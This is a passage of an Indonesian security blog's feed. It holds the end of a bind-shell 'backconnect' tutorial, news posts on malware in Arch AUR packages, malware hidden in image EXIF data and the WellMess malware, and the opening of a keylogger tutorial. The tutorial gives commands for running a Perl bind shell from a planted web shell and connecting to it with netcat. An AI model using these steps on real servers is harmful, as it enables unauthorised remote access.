Folder]&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Using Command :&lt;br /&gt;Windows User : &lt;b&gt;cd C:/[PathNetcat]/&lt;/b&gt;&lt;br /&gt;Linux User :&amp;nbsp;&lt;b&gt;Direct order&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;Command &lt;b&gt;nc -vv [ServerIP] [Port]&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;if done not enter first&lt;br /&gt;and go to shell backdoor/webconsole&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;in web console u can command&lt;br /&gt;&lt;b&gt;Perl bind.pl 1337&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;and Press Enter&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Notes : &lt;b&gt;bind.pl&lt;/b&gt; =&amp;gt; Name file bindshell , &lt;b&gt;1337&lt;/b&gt; =&amp;gt; Port&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;Step 5 :&lt;/b&gt;&lt;br /&gt;Go back in cmd/Terminal&lt;br /&gt;and Press Enter&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;and see what happens&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Backconnect Success :p&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;PoC Video :&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;iframe allowfullscreen=&quot;&quot; class=&quot;YOUTUBE-iframe-video&quot; data-thumbnail-src=&quot;https://i.ytimg.com/vi/oP2dFbal7uU/0.jpg&quot; frameborder=&quot;0&quot; height=&quot;266&quot; src=&quot;https://www.youtube.com/embed/oP2dFbal7uU?feature=player_embedded&quot; width=&quot;320&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;br /&gt;Notes :&amp;nbsp;This trick does not run 100% on all servers and the important thing that must be considered is PERL, whether the web server is ON or OFF&lt;br /&gt;&lt;br /&gt;(Zaenal Arifin)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/6404813628946650386/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/08/tutorial-backconnect-using-bindshell.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/6404813628946650386'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/6404813628946650386'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/08/tutorial-backconnect-using-bindshell.html' title='Tutorial Backconnect Dengan BindShell'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://1.bp.blogspot.com/-lv9PqMsVJMw/W2q4zE7wejI/AAAAAAAAAKc/3Yp2bWoy-Eg9J50W9Ham8VOd_mga70tCgCLcBGAs/s72-c/BindShell.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-6247817227492976701</id><published>2018-07-22T09:42:00.002-07:00</published><updated>2018-07-22T14:57:16.419-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Linux"/><category scheme="http://www.blogger.com/atom/ns#" term="Malware"/><category scheme="http://www.blogger.com/atom/ns#" term="Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Shell"/><category scheme="http://www.blogger.com/atom/ns#" term="Software"/><category scheme="http://www.blogger.com/atom/ns#" term="Technology"/><title type='text'>Serangan Malware Pada Arch Linux AUR Repository - Tiga Paket Terinfeksi</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://3.bp.blogspot.com/-qywIjaeq8eY/W1SvEqK0AkI/AAAAAAAAAJw/qKi0Pqep4hIPrZr_rayXl5lZoZ2yNXHugCLcBGAs/s1600/arch-linux.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;506&quot; data-original-width=&quot;900&quot; height=&quot;358&quot; src=&quot;https://3.bp.blogspot.com/-qywIjaeq8eY/W1SvEqK0AkI/AAAAAAAAAJw/qKi0Pqep4hIPrZr_rayXl5lZoZ2yNXHugCLcBGAs/s640/arch-linux.png&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Repositori perangkat lunak Linux Arch bernama Arch User Repository (AUR) telah terinfeksi oleh malware. Sebanyak tiga paket Linux Arch yang tersedia di repositori telah dilaporkan mengandung malware.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Repositori memiliki paket yang dikirim oleh pengguna, dan begitulah cara malware itu dirilis di repositori. Seorang pengguna bernama &quot;xeactor&quot; mengambil alih paket ‘orphaned’ dengan nama &quot;acroread&quot; yang berfungsi sebagai penampil PDF dan menambahkan kode jahat.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Seperti yang&amp;nbsp;&lt;a href=&quot;https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&amp;amp;id=b3fec9f2f16703c2dae9e793f75ad6e0d98509bc&quot;&gt;dilakukan Git&lt;/a&gt;, &quot;Xeactor&quot; menambahkan kode yang akan mengunduh skrip yang nantinya akan menginstal perangkat lunak yang ikut campur dengan &quot;sistemd&quot; dan mengkonfigurasikannya kembali. Skrip ini akan berjalan setiap 360 detik.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Malware yang dimaksudkan untuk mengumpulkan data dari sistem yang terinfeksi termasuk tanggal, waktu, ID mesin, rincian paket pengelola, informasi CPU dan output dari perintah &quot;uname-a&quot; dan &quot;systemctl list-units&quot;. Data yang dikumpulkan akan diposting dalam file Pastebin baru.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Dua paket lain juga&amp;nbsp;&lt;a href=&quot;https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html&quot;&gt;terinfeksi&lt;/a&gt;&amp;nbsp;dengan cara yang sama. Meskipun tidak menimbulkan ancaman serius terhadap komputer yang terinfeksi, diperkirakan bahwa &quot;xeactor&quot; dapat meluncurkan malware lain karena mekanisme pembaruan diri tidak disertakan.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Setelah menemukan malware, perubahan yang dilakukan dalam paket itu dibatalkan, dan tim AUR telah menangguhkan &quot;xeactor.&quot;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Namun, serangan malware ini menimbulkan kekhawatiran serius atas kredibilitas repositori paket yang dikirim pengguna. Awal tahun ini, Tim Toko Ubuntu juga menemukan penambang cryptocurrency yang tersembunyi dalam paket Ubuntu.&lt;/span&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/6247817227492976701/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/serangan-malware-pada-arch-linux-aur.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/6247817227492976701'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/6247817227492976701'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/serangan-malware-pada-arch-linux-aur.html' title='Serangan Malware Pada Arch Linux AUR Repository - Tiga Paket Terinfeksi'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://3.bp.blogspot.com/-qywIjaeq8eY/W1SvEqK0AkI/AAAAAAAAAJw/qKi0Pqep4hIPrZr_rayXl5lZoZ2yNXHugCLcBGAs/s72-c/arch-linux.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-8818930191221891376</id><published>2018-07-22T09:41:00.002-07:00</published><updated>2018-07-22T14:57:43.258-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Google"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="Malware"/><category scheme="http://www.blogger.com/atom/ns#" term="Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Server"/><category scheme="http://www.blogger.com/atom/ns#" term="Software"/><category scheme="http://www.blogger.com/atom/ns#" term="Technology"/><title type='text'>Peretas Menggunakan Server Google Untuk Menyelenggarakan Malware Secara Gratis</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://2.bp.blogspot.com/-2Zf-GMVcURc/W1Ss7qf0dcI/AAAAAAAAAJc/RngVGKJdmz0GYhQPoXx0ws7K0o67fJmngCLcBGAs/s1600/malware-in-images-googleusercontent-640x360.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;360&quot; data-original-width=&quot;640&quot; height=&quot;360&quot; src=&quot;https://2.bp.blogspot.com/-2Zf-GMVcURc/W1Ss7qf0dcI/AAAAAAAAAJc/RngVGKJdmz0GYhQPoXx0ws7K0o67fJmngCLcBGAs/s640/malware-in-images-googleusercontent-640x360.png&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Di masa lalu, para peneliti keamanan telah menemukan kasus di mana hacker yang terkenal mampu menggunakan data gambar EXIF ​​untuk menyembunyikan kode berbahaya. Teknik ini masih banyak digunakan untuk menginfeksi pengguna web dengan malware.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Selangkah lebih maju, telah ditemukan bahwa peretas telah menemukan cara untuk berbagi malware melalui server Google tepercaya dan tepercaya seperti milik googleusercontent. Bertentangan dengan malware yang disimpan dalam file teks, jauh lebih sulit untuk melihat muatan berbahaya dalam gambar. Selain itu, semakin sulit melaporkan malware yang ditemukan di googleusercontent.com ke Google.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Bagi mereka yang tidak tahu, googleusercontent adalah domain Google untuk melayani konten yang disediakan pengguna tanpa memengaruhi keamanan laman Google sendiri.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Sesuai&amp;nbsp;&lt;a href=&quot;https://blog.sucuri.net/2018/07/hiding-malware-inside-images-on-googleusercontent.html&quot;&gt;laporan Sucuri&lt;/a&gt;, kode berikut terlihat dalam skrip yang mengekstrak kode keamanan PayPal:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://1.bp.blogspot.com/-BiznTgP_Pw4/W1Stj1VxjQI/AAAAAAAAAJk/lkYfsIrJ7yATxo5inU4NNPZ2z0_M7LLMwCLcBGAs/s1600/Code%2BMalware.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;54&quot; data-original-width=&quot;599&quot; height=&quot;56&quot; src=&quot;https://1.bp.blogspot.com/-BiznTgP_Pw4/W1Stj1VxjQI/AAAAAAAAAJk/lkYfsIrJ7yATxo5inU4NNPZ2z0_M7LLMwCLcBGAs/s640/Code%2BMalware.png&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Skrip membaca data EXIF ​​dari gambar googleusercontent, yang mungkin diunggah oleh seseorang di akun Google+ atau Blogger. Ketika bagian UserComment dari data EXIF-nya didekodekan, ternyata itu adalah skrip yang memiliki kemampuan untuk mengunggah file web shell dan arbitrary.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Ini menggaris bawahi ancaman yang lebih besar karena tidak ada cara untuk mendeteksi malware sampai seseorang memeriksa meta data gambar dan menguraikannya. Bahkan setelah menemukan malware, seseorang tidak dapat mengetahui sumber sebenarnya dari gambar tersebut.&lt;/span&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/8818930191221891376/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/peretas-menggunakan-server-google-untuk.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/8818930191221891376'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/8818930191221891376'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/peretas-menggunakan-server-google-untuk.html' title='Peretas Menggunakan Server Google Untuk Menyelenggarakan Malware Secara Gratis'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://2.bp.blogspot.com/-2Zf-GMVcURc/W1Ss7qf0dcI/AAAAAAAAAJc/RngVGKJdmz0GYhQPoXx0ws7K0o67fJmngCLcBGAs/s72-c/malware-in-images-googleusercontent-640x360.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-310885343591880829</id><published>2018-07-22T09:40:00.001-07:00</published><updated>2018-07-22T14:58:07.709-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Linux"/><category scheme="http://www.blogger.com/atom/ns#" term="Malware"/><category scheme="http://www.blogger.com/atom/ns#" term="Microsoft"/><category scheme="http://www.blogger.com/atom/ns#" term="Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Server"/><category scheme="http://www.blogger.com/atom/ns#" term="Shell"/><category scheme="http://www.blogger.com/atom/ns#" term="Software"/><category scheme="http://www.blogger.com/atom/ns#" term="Windows"/><title type='text'> WellMess : Malware Berbasis Go Kini Menyerang Komputer Linux dan Windows</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://2.bp.blogspot.com/-vUFZojTohpY/W1SrJmz6VBI/AAAAAAAAAJQ/nJlyOt7QMa4Que5fA0-6udSfpC5-bqBiwCLcBGAs/s1600/wellmess-malware.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;506&quot; data-original-width=&quot;900&quot; height=&quot;358&quot; src=&quot;https://2.bp.blogspot.com/-vUFZojTohpY/W1SrJmz6VBI/AAAAAAAAAJQ/nJlyOt7QMa4Que5fA0-6udSfpC5-bqBiwCLcBGAs/s640/wellmess-malware.jpeg&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Tidak ada keraguan bahwa Linux dan Mac adalah pilihan sistem operasi yang lebih aman daripada Microsoft Windows. Tetapi ini tidak berarti bahwa peretas tidak menemukan cara untuk menginfeksi komputer yang menjalankan sistem operasi ini - di masa lalu, kami menemukan botnet Mirai masif yang mengontrol perangkat jaringan yang menjalankan Linux.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Pembuat Mirai menggunakan bahasa pemrograman Golang (juga disebut Go) untuk menulis kode malware. Baru-baru ini, para&amp;nbsp;&lt;a href=&quot;https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html&quot;&gt;peneliti keamanan di JPCERT&lt;/a&gt;&amp;nbsp;(Via:&amp;nbsp;&lt;a href=&quot;https://www.techrepublic.com/article/this-new-dual-platform-malware-targets-both-windows-and-linux-systems/&quot;&gt;TechRepublic&lt;/a&gt;) telah menemukan malware lain yang ditulis di Go; itu bahkan fitur kemampuan lintas-platform dan datang dalam dua versi.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Namanya WellMess, malware ini mempengaruhi sistem operasi Linux dan Windows. Sementara fungsi dasar dari kedua versi malware tetap sama, ada beberapa perbedaan kecil.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Sama seperti malware lainnya, WellMess berkomunikasi dengan perintah &amp;amp; kontrol (C &amp;amp; C) pusatnya dan mengunduh perintah untuk tindakan lebih lanjut. Perintah dapat diberikan dari server C &amp;amp; C untuk mengunggah / mengunduh file dan mengeksekusi perintah shell sewenang-wenang. Versi Windows lebih lanjut memiliki kemampuan untuk menjalankan skrip PowerShell.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Perintah dikirim ke perangkat yang terinfeksi dalam bentuk permintaan HTTP Post terenkode RSA; data header cookie dienkripsi RC6. Bukan itu saja. WellMess juga memiliki versi yang dikembangkan di .Net Framework. Data cookie dalam versi .Net sama dengan versi Go.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Seperti JPCERT, kejadian-kejadian serangan telah ditemukan di organisasi Jepang, dan mereka dapat terus berlanjut di masa depan juga.&lt;/span&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/310885343591880829/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/wellmess-malware-berbasis-go-kini.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/310885343591880829'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/310885343591880829'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/wellmess-malware-berbasis-go-kini.html' title=' WellMess : Malware Berbasis Go Kini Menyerang Komputer Linux dan Windows'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://2.bp.blogspot.com/-vUFZojTohpY/W1SrJmz6VBI/AAAAAAAAAJQ/nJlyOt7QMa4Que5fA0-6udSfpC5-bqBiwCLcBGAs/s72-c/wellmess-malware.jpeg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-4176891508006905585</id><published>2018-07-22T09:38:00.001-07:00</published><updated>2018-07-22T14:58:28.137-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="Java Script"/><category scheme="http://www.blogger.com/atom/ns#" term="Keylogger"/><category scheme="http://www.blogger.com/atom/ns#" term="Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Shell"/><category scheme="http://www.blogger.com/atom/ns#" term="Technology"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>Tutorial Memasang Keylogger di JavaScript</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://4.bp.blogspot.com/-1hMZoYvbDRE/W1Qz-BIEMoI/AAAAAAAAAIs/kLkZ0Wq5Qs8aU7VGDDS6B3y1wThQbqrWwCLcBGAs/s1600/KeyLog.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;800&quot; data-original-width=&quot;1600&quot; height=&quot;320&quot; src=&quot;https://4.bp.blogspot.com/-1hMZoYvbDRE/W1Qz-BIEMoI/AAAAAAAAAIs/kLkZ0Wq5Qs8aU7VGDDS6B3y1wThQbqrWwCLcBGAs/s640/KeyLog.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;Oke sebelumnya saya sudah menjelaskan tentang&amp;nbsp;&lt;a href=&quot;https://www.bandungdigitalsecurity.org/2018/07/malware-attack-using-javascript.html&quot;&gt;Keylogger di Java 